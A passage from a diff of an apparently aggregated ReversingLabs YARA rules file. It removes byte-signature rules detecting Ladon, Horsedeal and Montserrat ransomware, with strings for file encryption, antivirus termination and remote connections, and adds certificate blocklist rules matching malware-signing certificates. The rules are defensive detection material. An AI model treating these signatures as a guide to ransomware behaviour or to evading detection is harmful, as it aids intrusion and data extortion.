A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89 - 45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 - } - $terminate_antivirus_processes_p2 = { - 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ?? - ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ?? - 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ?? - 72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF - 15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? - ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Select'Assistance Pro" and pe.signatures[i].serial=="06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16194-L16210" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($terminate_antivirus_processes_p*)) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE { meta: - description = "Yara rule that detects Ladon ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ebc8f957-cdcf-54eb-bd02-74088cf51768" - date = "2020-07-15" - modified = "2020-07-15" + id = "77d6756b-e948-5771-9ec1-f5159b0e792c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16212-L16228" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ladon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 - 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 - 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? - 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85 - ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B - 34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ?? - 66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 - C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F - 95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83 - C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? - FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF - 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF - 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF - 77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF - 77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85 - ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? - 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70 - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45 - ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57 - 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 - ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ?? - ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45 - } - $encrypt_files_p2 = { - 8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75 - ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F - 43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 - 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? - 8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ?? - ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? - ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ?? - ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ?? - ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E - 5B 8B E5 5D C3 - } - $remote_connection = { - 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? - 85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? - 83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "xlgames" and pe.signatures[i].serial=="63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "2fc1303f-e559-59ba-a1b9-b74a154d8805" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16230-L16246" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KOG Co., Ltd." and pe.signatures[i].serial=="66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Horsedeal : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE { meta: - description = "Yara rule that detects Horsedeal ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c722bc5b-756e-5d46-8530-e20ebb73737c" - date = "2020-10-01" - modified = "2020-10-01" + id = "de018b47-9fbd-590e-b3d1-b50029496718" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Horsedeal.yara#L1-L106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fa8c425b08606399b5dc7673f3898e3dba7efb6a62e56db8f500cf5072bb590b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16248-L16264" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Horsedeal" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_processes = { - 55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D - 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 - FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ?? - ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ?? - ?? ?? ?? 5E C9 C3 - } - $enum_resources = { - 55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ?? - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ?? - ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47 - ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D - 44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? - ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $find_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 - 8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? - ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 - C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D - 44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 - ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? - 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ?? - ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 - ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? - ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? - ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35 - ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B - CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ?? - 8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF - D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D - ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ?? - 41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ?? - 57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6 - 8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F - 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF - 15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? - 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35 - ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - } - $encrypt_files_p2 = { - 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF - 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ?? - 6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ?? - ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45 - ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D - 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D - 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A - ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B - 45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45 - ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A - ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF - D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? - ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ?? - ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wemade Entertainment" and pe.signatures[i].serial=="61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16266-L16282" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_resources) and ($search_processes) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LivePlex Corp" and pe.signatures[i].serial=="1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE { meta: - description = "Yara rule that detects Montserrat ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89" - date = "2020-07-15" - modified = "2020-07-15" + id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16284-L16300" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Montserrat" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 